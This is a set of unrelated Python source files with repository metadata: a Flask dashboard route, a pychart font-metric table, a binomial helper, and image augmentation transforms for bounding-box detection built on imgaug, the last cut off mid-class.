panuta/fund-dashboard
|
1d24489869cb2099073ed5f19a577f0913599524
|
[
"MIT"
] | null | null | null |
from flask import render_template
from . import dashboard_blueprint
@dashboard_blueprint.route('/')
def index():
    """Render the dashboard landing page at the blueprint root URL."""
    return render_template('dashboard/dashboard.html')
| 19
| 54
| 0.783626
| 20
| 171
| 6.5
| 0.6
| 0.215385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116959
| 171
| 8
| 55
| 21.375
| 0.860927
| 0
| 0
| 0
| 0
| 0
| 0.146199
| 0.140351
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0.4
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
ee69d2fbd744eef2a81b685399b1bb5011fb81cf
| 1,491
|
py
|
Python
|
venv/lib/python2.7/site-packages/pychart/afm/AvantGarde_Demi.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | 1
|
2019-12-19T01:53:13.000Z
|
2019-12-19T01:53:13.000Z
|
venv/lib/python2.7/site-packages/pychart/afm/AvantGarde_Demi.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
venv/lib/python2.7/site-packages/pychart/afm/AvantGarde_Demi.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
# AFM font AvantGarde-Demi (path: /usr/share/fonts/afms/adobe/pagd8a.afm).
# Derived from Ghostscript distribution.
# Go to www.cs.wisc.edu/~ghost to get the Ghostcript source code.
import dir
# Register the per-glyph advance widths for AvantGarde-Demi in the shared
# AFM font table. The tuple holds one width per character code 0-255,
# presumably in 1/1000-em units as is conventional for AFM metrics --
# confirm against the dir module that consumes this table.
dir.afm["AvantGarde-Demi"] = (500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 280, 280, 360, 560, 560, 860, 680, 280, 380, 380, 440, 600, 280, 420, 280, 460, 560, 560, 560, 560, 560, 560, 560, 560, 560, 560, 280, 280, 600, 600, 600, 560, 740, 740, 580, 780, 700, 520, 480, 840, 680, 280, 480, 620, 440, 900, 740, 840, 560, 840, 580, 520, 420, 640, 700, 900, 680, 620, 500, 320, 640, 320, 600, 500, 280, 660, 660, 640, 660, 640, 280, 660, 600, 240, 260, 580, 240, 940, 600, 640, 660, 660, 320, 440, 300, 600, 560, 800, 560, 580, 460, 340, 600, 340, 600, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 280, 560, 560, 160, 560, 560, 560, 560, 220, 480, 460, 240, 240, 520, 520, 500, 500, 560, 560, 280, 500, 600, 600, 280, 480, 480, 460, 1000, 1280, 500, 560, 500, 420, 420, 540, 480, 420, 480, 280, 500, 500, 360, 340, 500, 700, 340, 540, 1000, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 900, 500, 360, 500, 500, 500, 500, 480, 840, 1060, 360, 500, 500, 500, 500, 500, 1080, 500, 500, 500, 240, 500, 500, 320, 660, 1080, 600, )
| 248.5
| 1,297
| 0.623742
| 287
| 1,491
| 3.240418
| 0.226481
| 0.587097
| 0.793548
| 0.980645
| 0.33871
| 0.303226
| 0.303226
| 0.303226
| 0.303226
| 0.270968
| 0
| 0.629019
| 0.186452
| 1,491
| 5
| 1,298
| 298.2
| 0.137675
| 0.117371
| 0
| 0
| 0
| 0
| 0.011433
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
c9cb1c8c4d58be409be220548bbed99656ba923d
| 139
|
py
|
Python
|
geomstats/_backend/_common.py
|
lpereira95/geomstats
|
c63a4cf28e6c09f6a6b9926e8a712838362017ba
|
[
"MIT"
] | null | null | null |
geomstats/_backend/_common.py
|
lpereira95/geomstats
|
c63a4cf28e6c09f6a6b9926e8a712838362017ba
|
[
"MIT"
] | null | null | null |
geomstats/_backend/_common.py
|
lpereira95/geomstats
|
c63a4cf28e6c09f6a6b9926e8a712838362017ba
|
[
"MIT"
] | null | null | null |
import math as _math
from numpy import pi
def comb(n, k):
    """Return the binomial coefficient C(n, k) using exact integer division.

    Raises ValueError (via factorial) for negative n or for k > n, matching
    the original factorial-based formulation.
    """
    numerator = _math.factorial(n)
    return numerator // _math.factorial(k) // _math.factorial(n - k)
| 17.375
| 77
| 0.683453
| 23
| 139
| 3.956522
| 0.521739
| 0.428571
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.18705
| 139
| 7
| 78
| 19.857143
| 0.80531
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
a0047ccb7b53bdc8ecf027146668a2e606041fdf
| 24,727
|
py
|
Python
|
dataloaders/custom_transforms.py
|
loxacom123/AutoML
|
8c5952467915f77d84705325b58b5dc9f3541d61
|
[
"MIT"
] | null | null | null |
dataloaders/custom_transforms.py
|
loxacom123/AutoML
|
8c5952467915f77d84705325b58b5dc9f3541d61
|
[
"MIT"
] | null | null | null |
dataloaders/custom_transforms.py
|
loxacom123/AutoML
|
8c5952467915f77d84705325b58b5dc9f3541d61
|
[
"MIT"
] | null | null | null |
import math
import torch
import random
import numpy as np
import torch.nn as nn
from numpy import int64 as int64
import torchvision.transforms as transforms
from imgaug import BoundingBox, BoundingBoxesOnImage
import imgaug.augmenters as iaa
from PIL import Image, ImageOps, ImageFilter
class Normalize(object):
    """Normalize a sample's image with per-channel mean and std deviation.

    The image is first scaled from [0, 255] to [0, 1], then shifted by
    ``mean`` and divided by ``std``; the label is only cast to float32.

    Args:
        mean (tuple): per-channel means subtracted after scaling.
        std (tuple): per-channel standard deviations used as divisors.
    """
    def __init__(self, mean=(0., 0., 0.), std=(1., 1., 1.)):
        self.mean = mean
        self.std = std
    def __call__(self, sample):
        image = np.array(sample['image']).astype(np.float32) / 255.0
        image = (image - self.mean) / self.std
        label = np.array(sample['label']).astype(np.float32)
        return {'image': image, 'label': label}
class ToTensor(object):
    """Convert the ndarrays in a sample to float torch Tensors.

    The image axes are swapped from numpy's H x W x C layout to torch's
    C x H x W; the label keeps its shape.
    """
    def __call__(self, sample):
        image = np.array(sample['image']).astype(np.float32).transpose((2, 0, 1))
        label = np.array(sample['label']).astype(np.float32)
        return {
            'image': torch.from_numpy(image).float(),
            'label': torch.from_numpy(label).float(),
        }
class RandomHorizontalFlip(object):
    """Mirror a PIL image/label pair left-right with probability 0.5."""
    def __call__(self, sample):
        image, label = sample['image'], sample['label']
        # Same coin flip as before: values below 0.5 trigger the mirror.
        if random.random() >= 0.5:
            return {'image': image, 'label': label}
        return {'image': image.transpose(Image.FLIP_LEFT_RIGHT),
                'label': label.transpose(Image.FLIP_LEFT_RIGHT)}
class Translate_Y(object):
    """Translate the image vertically by a fraction of its height,
    moving the bounding boxes along with it."""
    def __init__(self, v):
        # v: signed fraction of image height to shift by (roughly -0.3..0.3).
        self.v = v
    def __call__(self, sample):
        image, annotations = sample['img'], sample['annot']
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3],
                         label=str(int(a[4]))) for a in annotations],
            shape=image.shape)
        transform = iaa.geometric.TranslateY(percent=self.v)
        image_out, boxes_out = transform(image=image, bounding_boxes=boxes)
        annot_out = np.array(
            [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out])
        if len(annot_out) == 0:
            # keep the (0, 5) shape contract even when every box is dropped
            annot_out = np.zeros((0, 5))
        return {'img': image_out, 'annot': annot_out}
#TODO: Enhance this function so bounding boxes will account for change in actual object,
# i.e. if the translateY bbox moves the object up, the lower limit of the bbox should move up
class Translate_Y_BBoxes(object):
    """Vertically translate only the pixels inside labeled bounding boxes.

    Uses BlendAlphaBoundingBoxes so the shift applies per box region
    rather than to the whole image.
    """
    def __init__(self, v):
        # v: signed fraction to shift the box contents by.
        self.v = v
    def __call__(self, sample):
        image, annotations = sample['img'], sample['annot']
        labels = np.unique(annotations[:, 4].astype('int').astype('str')).tolist()
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3],
                         label=str(int(a[4]))) for a in annotations],
            shape=image.shape)
        transform = iaa.BlendAlphaBoundingBoxes(
            labels=labels,
            foreground=iaa.geometric.TranslateY(percent=self.v))
        image_out, boxes_out = transform(image=image, bounding_boxes=boxes)
        annot_out = np.array(
            [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out])
        if len(annot_out) == 0:
            # keep the (0, 5) shape contract even when every box is dropped
            annot_out = np.zeros((0, 5))
        return {'img': image_out, 'annot': annot_out}
class Translate_X(object):
    """Translate the image horizontally by a fraction of its width,
    moving the bounding boxes along with it."""
    def __init__(self, v):
        # v: signed fraction of image width to shift by.
        self.v = v
    def __call__(self, sample):
        image, annotations = sample['img'], sample['annot']
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3],
                         label=str(int(a[4]))) for a in annotations],
            shape=image.shape)
        transform = iaa.geometric.TranslateX(percent=self.v)
        image_out, boxes_out = transform(image=image, bounding_boxes=boxes)
        annot_out = np.array(
            [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out])
        if len(annot_out) == 0:
            # keep the (0, 5) shape contract even when every box is dropped
            annot_out = np.zeros((0, 5))
        return {'img': image_out, 'annot': annot_out}
class Translate_X_BBoxes(object):
    """Translate only the box regions horizontally, blending them back in."""

    def __init__(self, v):
        # Fraction of image width to shift the box contents by.
        self.v = v

    def __call__(self, sample):
        image, annot = sample['img'], sample['annot']
        # BlendAlphaBoundingBoxes restricts the effect to these class labels.
        labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3], label=str(int(a[4])))
             for a in annot],
            shape=image.shape)
        aug = iaa.BlendAlphaBoundingBoxes(
            labels=labels,
            foreground=iaa.geometric.TranslateX(percent=self.v))
        image_out, boxes_out = aug(image=image, bounding_boxes=boxes)
        rows = [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out]
        # Downstream code expects at least shape (0, 5) when no boxes survive.
        annot_out = np.array(rows) if rows else np.zeros((0, 5))
        return {'img': image_out, 'annot': annot_out}
class CutOut(object):
    """Cut out several small gaussian-filled patches from the image."""

    def __init__(self, v):
        # Number of cutout patches; expected roughly in 6 .. 20.
        self.v = v

    def __call__(self, sample):
        image, annot = sample['img'], sample['annot']
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3], label=str(int(a[4])))
             for a in annot],
            shape=image.shape)
        aug = iaa.Cutout(nb_iterations=int(round(self.v)), size=0.05,
                         fill_mode="gaussian")
        image_out, boxes_out = aug(image=image, bounding_boxes=boxes)
        rows = [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out]
        # Downstream code expects at least shape (0, 5) when no boxes survive.
        annot_out = np.array(rows) if rows else np.zeros((0, 5))
        return {'img': image_out, 'annot': annot_out}
class CutOut_BBoxes(object):
    """Apply cutout only inside the annotated bounding boxes."""

    def __init__(self, v):
        # Number of cutout patches; expected roughly in 6 .. 20.
        self.v = v

    def __call__(self, sample):
        image, annot = sample['img'], sample['annot']
        # BlendAlphaBoundingBoxes restricts the effect to these class labels.
        labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3], label=str(int(a[4])))
             for a in annot],
            shape=image.shape)
        aug = iaa.BlendAlphaBoundingBoxes(
            labels=labels,
            foreground=iaa.Cutout(nb_iterations=int(round(self.v)), size=0.05,
                                  fill_mode="gaussian"))
        image_out, boxes_out = aug(image=image, bounding_boxes=boxes)
        rows = [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out]
        # Downstream code expects at least shape (0, 5) when no boxes survive.
        annot_out = np.array(rows) if rows else np.zeros((0, 5))
        return {'img': image_out, 'annot': annot_out}
class Rotate(object):
    """Rotate the image and its bounding boxes by a fixed angle in degrees."""

    def __init__(self, v):
        # Rotation angle in degrees; expected roughly in -30 .. 30.
        self.v = v

    def __call__(self, sample):
        image, annot = sample['img'], sample['annot']
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3], label=str(int(a[4])))
             for a in annot],
            shape=image.shape)
        image_out, boxes_out = iaa.Rotate(rotate=self.v)(
            image=image, bounding_boxes=boxes)
        rows = [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out]
        # Downstream code expects at least shape (0, 5) when no boxes survive.
        annot_out = np.array(rows) if rows else np.zeros((0, 5))
        return {'img': image_out, 'annot': annot_out}
# TODO: Figure out how to make rotate just bboxes work correctly
# class Rotate_BBoxes(object):
# def __init__(self):
# pass
#
# def __call__(self, sample):
# img, annot = sample['img'], sample['annot']
# unique_labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
#
# bbs = BoundingBoxesOnImage(
# [BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
# shape=img.shape)
# aug = iaa.Rotate(30)
# img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
# rotate_bb_aug = iaa.BlendAlphaBoundingBoxes(labels=unique_labels,
# foreground=iaa.Rotate(30))
# img_rotate_bb_aug, bbs_rotate_bb_aug = rotate_bb_aug(image=img, bounding_boxes=bbs_aug)
# drawn_img = bbs_rotate_bb_aug.draw_on_image(img_rotate_bb_aug * 255, size=2, color=[0, 255., 0])
# import skimage
# skimage.io.imsave('draw10.png', drawn_img)
class ShearX(object):
    """Shear the image and its bounding boxes along the x axis."""

    def __init__(self, v):
        # Shear angle in degrees; expected roughly in -30 .. 30.
        self.v = v

    def __call__(self, sample):
        image, annot = sample['img'], sample['annot']
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3], label=str(int(a[4])))
             for a in annot],
            shape=image.shape)
        image_out, boxes_out = iaa.ShearX(self.v)(
            image=image, bounding_boxes=boxes)
        rows = [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out]
        # Downstream code expects at least shape (0, 5) when no boxes survive.
        annot_out = np.array(rows) if rows else np.zeros((0, 5))
        return {'img': image_out, 'annot': annot_out}
class ShearX_BBoxes(object):
    """Shear only the box regions along the x axis, blending them back in."""

    def __init__(self, v):
        # Shear angle in degrees; expected roughly in -30 .. 30.
        self.v = v

    def __call__(self, sample):
        image, annot = sample['img'], sample['annot']
        # BlendAlphaBoundingBoxes restricts the effect to these class labels.
        labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3], label=str(int(a[4])))
             for a in annot],
            shape=image.shape)
        aug = iaa.BlendAlphaBoundingBoxes(labels=labels,
                                          foreground=iaa.ShearX(self.v))
        image_out, boxes_out = aug(image=image, bounding_boxes=boxes)
        rows = [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out]
        # Downstream code expects at least shape (0, 5) when no boxes survive.
        annot_out = np.array(rows) if rows else np.zeros((0, 5))
        return {'img': image_out, 'annot': annot_out}
class ShearY(object):
    """Shear the image and its bounding boxes along the y axis."""

    def __init__(self, v):
        # Shear angle in degrees; expected roughly in -30 .. 30.
        self.v = v

    def __call__(self, sample):
        image, annot = sample['img'], sample['annot']
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3], label=str(int(a[4])))
             for a in annot],
            shape=image.shape)
        image_out, boxes_out = iaa.ShearY(self.v)(
            image=image, bounding_boxes=boxes)
        rows = [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out]
        # Downstream code expects at least shape (0, 5) when no boxes survive.
        annot_out = np.array(rows) if rows else np.zeros((0, 5))
        return {'img': image_out, 'annot': annot_out}
class ShearY_BBoxes(object):
    """Shear only the box regions along the y axis, blending them back in."""

    def __init__(self, v):
        # Shear angle in degrees; expected roughly in -30 .. 30.
        self.v = v

    def __call__(self, sample):
        image, annot = sample['img'], sample['annot']
        # BlendAlphaBoundingBoxes restricts the effect to these class labels.
        labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3], label=str(int(a[4])))
             for a in annot],
            shape=image.shape)
        aug = iaa.BlendAlphaBoundingBoxes(labels=labels,
                                          foreground=iaa.ShearY(self.v))
        image_out, boxes_out = aug(image=image, bounding_boxes=boxes)
        rows = [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out]
        # Downstream code expects at least shape (0, 5) when no boxes survive.
        annot_out = np.array(rows) if rows else np.zeros((0, 5))
        return {'img': image_out, 'annot': annot_out}
class Equalize(object):
    """Histogram-equalize every channel of the image; boxes are untouched."""

    def __init__(self, v):
        # Magnitude is unused for equalization; kept for a uniform interface.
        self.v = v

    def __call__(self, sample):
        image, annot = sample['img'], sample['annot']
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3], label=str(int(a[4])))
             for a in annot],
            shape=image.shape)
        # Equalization needs uint8 input; convert from [0, 1] floats and back.
        image_u8 = (image * 255.).astype('uint8')
        image_out, boxes_out = iaa.AllChannelsHistogramEqualization()(
            image=image_u8, bounding_boxes=boxes)
        image_out = image_out.astype('float32') / 255.
        rows = [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out]
        # Downstream code expects at least shape (0, 5) when no boxes survive.
        annot_out = np.array(rows) if rows else np.zeros((0, 5))
        return {'img': image_out, 'annot': annot_out}
class Equalize_BBoxes(object):
    """Histogram-equalize only inside the annotated bounding boxes."""

    def __init__(self, v):
        # Magnitude is unused for equalization; kept for a uniform interface.
        self.v = v

    def __call__(self, sample):
        image, annot = sample['img'], sample['annot']
        # BlendAlphaBoundingBoxes restricts the effect to these class labels.
        labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3], label=str(int(a[4])))
             for a in annot],
            shape=image.shape)
        aug = iaa.BlendAlphaBoundingBoxes(
            labels=labels,
            foreground=iaa.AllChannelsHistogramEqualization())
        # Equalization needs uint8 input; convert from [0, 1] floats and back.
        image_u8 = (image * 255.).astype('uint8')
        image_out, boxes_out = aug(image=image_u8, bounding_boxes=boxes)
        image_out = image_out.astype('float32') / 255.
        rows = [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out]
        # Downstream code expects at least shape (0, 5) when no boxes survive.
        annot_out = np.array(rows) if rows else np.zeros((0, 5))
        return {'img': image_out, 'annot': annot_out}
class Solarize(object):
    """Invert pixels above a threshold, working in [-1, 1] value space."""

    def __init__(self, v):
        # Solarization threshold; expected in -1 .. 1.
        self.v = v

    def __call__(self, sample):
        image, annot = sample['img'], sample['annot']
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3], label=str(int(a[4])))
             for a in annot],
            shape=image.shape)
        # Map [0, 1] -> [-1, 1] for the augmenter, then back afterwards.
        image_out, boxes_out = iaa.pillike.Solarize(threshold=self.v)(
            image=(image * 2. - 1.), bounding_boxes=boxes)
        rows = [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out]
        # Downstream code expects at least shape (0, 5) when no boxes survive.
        annot_out = np.array(rows) if rows else np.zeros((0, 5))
        return {'img': (image_out + 1.) / 2, 'annot': annot_out}
class Solarize_BBoxes(object):
    """Solarize only inside the annotated bounding boxes.

    Works in [-1, 1] value space like ``Solarize``: the image is mapped
    from [0, 1] on the way in and back out on return.
    """

    def __init__(self, v):
        self.v = v  # solarization threshold; expected in -1 .. 1

    def __call__(self, sample):
        img, annot = sample['img'], sample['annot']
        unique_labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
        bbs = BoundingBoxesOnImage(
            [BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
            shape=img.shape)
        # Bug fix: threshold was hard-coded to 0., silently ignoring the
        # configured magnitude; use self.v, matching the sibling Solarize.
        aug = iaa.BlendAlphaBoundingBoxes(labels=unique_labels,
                                          foreground=iaa.pillike.Solarize(threshold=self.v))
        img_aug, bbs_aug = aug(image=(img * 2. - 1.), bounding_boxes=bbs)
        img_aug = (img_aug + 1.) / 2
        annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
        # the shape has to be at least (0,5)
        if len(annot_aug) == 0:
            annot_aug = np.zeros((0, 5))
        return {'img': img_aug, 'annot': annot_aug}
class Color(object):
    """Adjust color saturation of the image; boxes are untouched."""

    def __init__(self, v):
        # Color enhancement factor; expected in 0.0 .. 3.0.
        self.v = v

    def __call__(self, sample):
        image, annot = sample['img'], sample['annot']
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3], label=str(int(a[4])))
             for a in annot],
            shape=image.shape)
        # The PIL-like augmenter needs uint8 input; convert and scale back.
        image_u8 = (image * 255.).astype('uint8')
        image_out, boxes_out = iaa.pillike.EnhanceColor(self.v)(
            image=image_u8, bounding_boxes=boxes)
        image_out = image_out.astype('float32') / 255.
        rows = [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out]
        # Downstream code expects at least shape (0, 5) when no boxes survive.
        annot_out = np.array(rows) if rows else np.zeros((0, 5))
        return {'img': image_out, 'annot': annot_out}
class Color_BBoxes(object):
    """Adjust color saturation only inside the annotated bounding boxes."""

    def __init__(self, v):
        # Color enhancement factor passed to EnhanceColor.
        self.v = v

    def __call__(self, sample):
        image, annot = sample['img'], sample['annot']
        # BlendAlphaBoundingBoxes restricts the effect to these class labels.
        labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
        boxes = BoundingBoxesOnImage(
            [BoundingBox(x1=a[0], y1=a[1], x2=a[2], y2=a[3], label=str(int(a[4])))
             for a in annot],
            shape=image.shape)
        aug = iaa.BlendAlphaBoundingBoxes(
            labels=labels,
            foreground=iaa.pillike.EnhanceColor(self.v))
        # The PIL-like augmenter needs uint8 input; convert and scale back.
        image_u8 = (image * 255.).astype('uint8')
        image_out, boxes_out = aug(image=image_u8, bounding_boxes=boxes)
        image_out = image_out.astype('float32') / 255.
        rows = [[b.x1, b.y1, b.x2, b.y2, np.float32(b.label)] for b in boxes_out]
        # Downstream code expects at least shape (0, 5) when no boxes survive.
        annot_out = np.array(rows) if rows else np.zeros((0, 5))
        return {'img': image_out, 'annot': annot_out}
class RandomRotate(object):
    """Rotate image and bounding boxes by a random angle in [-degree, degree].

    Returns a detection-style sample ``{'img': ..., 'annot': ...}`` like the
    other imgaug-based transforms in this file.
    """

    def __init__(self, degree):
        # Maximum absolute rotation angle in degrees.
        self.degree = degree

    def __call__(self, sample):
        img, annot = sample['img'], sample['annot']
        rotate_degree = random.uniform(-1 * self.degree, self.degree)
        bbs = BoundingBoxesOnImage(
            [BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
            shape=img.shape)
        # Bug fix: the original applied a TranslateY augmenter, then returned
        # the UN-augmented image plus an undefined `mask` (NameError) under
        # segmentation-style keys. Actually rotate by the sampled angle and
        # return the augmented sample in the detection format.
        aug = iaa.Rotate(rotate=rotate_degree)
        img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
        annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
        # the shape has to be at least (0,5)
        if len(annot_aug) == 0:
            annot_aug = np.zeros((0, 5))
        return {'img': img_aug, 'annot': annot_aug}
# FLIP LR BBOXES ONLY DOESNT SEEM to WORK WITH THIS LIBRARY SO FAR
class FlipLR(object):
    """Deterministically mirror the image and its boxes left-right."""

    def __init__(self, v):
        # Magnitude is meaningless for a flip; kept for a uniform interface.
        self.v = v

    def __call__(self, sample):
        img, annot = sample['img'], sample['annot']
        bbs = BoundingBoxesOnImage(
            [BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
            shape=img.shape)
        # Bug fix: pass the flip probability explicitly. The bare iaa.Fliplr()
        # relied on the library default, which can leave this transform a
        # no-op; p=1.0 makes the flip deterministic like the other transforms.
        aug = iaa.Fliplr(1.0)
        img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
        annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
        # the shape has to be at least (0,5); this guard was missing here
        # although every sibling transform has it.
        if len(annot_aug) == 0:
            annot_aug = np.zeros((0, 5))
        return {'img': img_aug, 'annot': annot_aug}
# TODO: fix this later
class RandomGaussianBlur(object):
    """Blur the image with a random-radius gaussian, half of the time."""

    def __init__(self, _):
        # Accepts (and ignores) a magnitude for interface uniformity.
        pass

    def __call__(self, sample):
        image, mask = sample['image'], sample['label']
        if random.random() < 0.5:
            radius = random.random()
            image = image.filter(ImageFilter.GaussianBlur(radius=radius))
        return {'image': image, 'label': mask}
class RandomScaleCrop(object):
    """Randomly rescale the short edge, pad if too small, then random-crop."""

    def __init__(self, base_size, crop_size, fill=0):
        self.base_size = base_size
        self.crop_size = crop_size
        # Value used to pad the mask (e.g. an ignore label).
        self.fill = fill

    def __call__(self, sample):
        image, mask = sample['image'], sample['label']
        # Draw a short-edge length in [0.5, 2.0] x base_size.
        short_size = random.randint(int(self.base_size * 0.5),
                                    int(self.base_size * 2.0))
        w, h = image.size
        if h > w:
            ow = short_size
            oh = int(1.0 * h * ow / w)
        else:
            oh = short_size
            ow = int(1.0 * w * oh / h)
        image = image.resize((ow, oh), Image.BILINEAR)
        mask = mask.resize((ow, oh), Image.NEAREST)
        # Pad on the right/bottom when the rescaled image is smaller than the crop.
        if short_size < self.crop_size:
            padh = max(self.crop_size - oh, 0)
            padw = max(self.crop_size - ow, 0)
            image = ImageOps.expand(image, border=(0, 0, padw, padh), fill=0)
            mask = ImageOps.expand(mask, border=(0, 0, padw, padh), fill=self.fill)
        # Random crop of crop_size x crop_size.
        w, h = image.size
        left = random.randint(0, w - self.crop_size)
        top = random.randint(0, h - self.crop_size)
        box = (left, top, left + self.crop_size, top + self.crop_size)
        return {'image': image.crop(box), 'label': mask.crop(box)}
class FixScaleCrop(object):
    """Resize so the short edge equals crop_size, then take a center crop."""

    def __init__(self, crop_size):
        self.crop_size = crop_size

    def __call__(self, sample):
        image, mask = sample['image'], sample['label']
        w, h = image.size
        # Scale the shorter side to crop_size, preserving aspect ratio.
        if w > h:
            oh = self.crop_size
            ow = int(1.0 * w * oh / h)
        else:
            ow = self.crop_size
            oh = int(1.0 * h * ow / w)
        image = image.resize((ow, oh), Image.BILINEAR)
        mask = mask.resize((ow, oh), Image.NEAREST)
        # Centered crop of crop_size x crop_size.
        w, h = image.size
        left = int(round((w - self.crop_size) / 2.))
        top = int(round((h - self.crop_size) / 2.))
        box = (left, top, left + self.crop_size, top + self.crop_size)
        return {'image': image.crop(box), 'label': mask.crop(box)}
# resize to 512*1024
class FixedResize(object):
    """Resize image and mask so the short edge equals the requested size."""

    def __init__(self, resize=512):
        # Target length for the shorter edge (e.g. 512).
        self.size1 = resize

    def __call__(self, sample):
        image, mask = sample['image'], sample['label']
        assert image.size == mask.size
        w, h = image.size
        # Scale the shorter side to size1, preserving aspect ratio.
        if w > h:
            oh = self.size1
            ow = int(1.0 * w * oh / h)
        else:
            ow = self.size1
            oh = int(1.0 * h * ow / w)
        image = image.resize((ow, oh), Image.BILINEAR)
        mask = mask.resize((ow, oh), Image.NEAREST)
        return {'image': image, 'label': mask}
# random crop 321*321
class RandomCrop(object):
